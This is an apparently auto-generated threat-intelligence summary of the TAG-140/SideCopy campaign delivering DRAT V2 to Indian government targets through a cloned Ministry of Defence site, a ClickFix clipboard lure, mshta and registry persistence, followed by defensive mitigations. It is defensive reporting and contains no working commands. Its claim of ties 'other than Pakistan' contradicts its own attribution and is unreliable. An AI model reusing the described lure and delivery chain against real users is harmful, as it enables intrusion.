Full Report
A hacking group with ties other than Pakistan has been found targeting Indian government organizations with a modified variant of a remote access trojan (RAT) called DRAT. The activity has been attributed by Recorded Future's Insikt Group to a threat actor tracked as TAG-140, which it said overlaps with SideCopy, an adversarial collective assessed to be an operational sub-cluster within
Analysis Summary
# Threat Actor: TAG-140 (Overlaps with SideCopy/Transparent Tribe)
## Attribution & Identity
Activity attributed by Recorded Future's Insikt Group to a threat actor tracked as **TAG-140**.
TAG-140 is assessed to overlap with **SideCopy**, which is considered an operational sub-cluster within **Transparent Tribe** (also known as APT-C-56, APT36, Datebug, Earth Karkaddan, Mythic Leopard, Operation C-Major, and ProjectM).
The group has been known to be active since at least 2019.
The article suggests TAG-140/SideCopy is linked to actors with ties other than Pakistan, though their associated cluster (Transparent Tribe) is often associated with Pakistan.
## Activity Summary
TAG-140 has been consistently advancing its malware arsenal and delivery techniques. The latest campaign involved spoofing the Indian Ministry of Defence via a cloned press release portal using a "ClickFix"-style approach to deliver a Delphi-compiled version of **DRAT V2**. This refined activity marks a shift in malware architecture and C2 functionality. The group is known to diversify its malware catalogue to complicate attribution. They were also active during the May 2025 India-Pakistan conflict, deploying **Ares RAT** against various sectors.
## Tactics, Techniques & Procedures
- **Initial Access/Delivery:** Used a forged website (cloned Indian Ministry of Defence press release portal) to drop malware.
- **Execution:** Employed a specific sequence where clicking a link copies a malicious command to the clipboard, urging the victim to paste and execute it via a command shell.
- **Execution/Staging:** Used `mshta.exe` to execute a retrieved HTML Application (HTA) file (`trade4wealth[.]in`).
- **Payload Loading:** Utilized a loader named **BroaderAspect** to download a decoy PDF, establish persistence, and download DRAT V2.
- **Persistence:** Established persistence via **Windows Registry** changes.
- **Post-Exploitation:** DRAT V2 supports arbitrary shell command execution, reconnaissance, uploading additional payloads, and data exfiltration.
- **Obfuscation/C2:** DRAT V2 obfuscates C2 IP addresses using **Base64-encoding** and uses a custom server-initiated TCP protocol that supports both ASCII and Unicode input (though the server responds only in ASCII). DRAT V2 is noted to keep most command headers in plaintext, prioritizing parsing reliability.
- **Malware Rotation:** The actor maintains an "interchangeable suite" of RATs to obscure signatures.
## Targeting
- **Sectors:** Indian government organizations, Defense, Maritime, Academic, Railway, Oil and Gas, External Affairs ministries. (Transparent Tribe/APT36 activity also targeted IT, Healthcare, and Telecom sectors).
- **Geography:** India (Primary focus mentioned for the DRAT V2 campaign).
- **Victims:** Organizations affiliated with Indian government ministries.
## Tools & Infrastructure
- **Malware families used (RAT Arsenal):** **DRAT V2** (latest variant), Action RAT, AllaKore RAT, Ares RAT, CurlBack RAT, ReverseRAT, Spark RAT, and Xeno RAT.
- **Loaders/Backdoors:** BroaderAspect.
- **Infrastructure:** External server at `trade4wealth[.]in` used for downloading HTA, persistence loader, and DRAT V2. (C2 details for DRAT V2 are self-obfuscating but use a custom TCP protocol). *(Note: The input text mentions other unrelated actors using Google Cloud and Discord for C2, but these are not specifically linked to the TAG-140 DRAT V2 campaign.)*
## Implications
TAG-140/SideCopy represents a persistent, evolving threat actor focused on espionage against Indian government and critical infrastructure entities. Their strategy of deploying a rotating "interchangeable suite" of RATs (like DRAT V2 replacing earlier variants) is designed to significantly complicate signature-based detection and attribution efforts. The refinement in C2 protocol (handling ASCII/Unicode) shows continuous adaptation.
## Mitigations
- Implement rigorous filtering and behavioral monitoring for suspicious execution chains involving `mshta.exe` launched after questionable external actions (like clipboard manipulation).
- Monitor for suspicious file creation and persistence mechanisms established via Windows Registry modifications.
- Harden systems against spear-phishing that spoofs official government portals.
- Organizations should be vigilant against the use of common Remote Access Trojans (RATs) mentioned in the group's arsenal.
- Static and behavioral analysis tools should be employed, as DRAT V2 lacks advanced anti-analysis techniques, making it detectable through these means.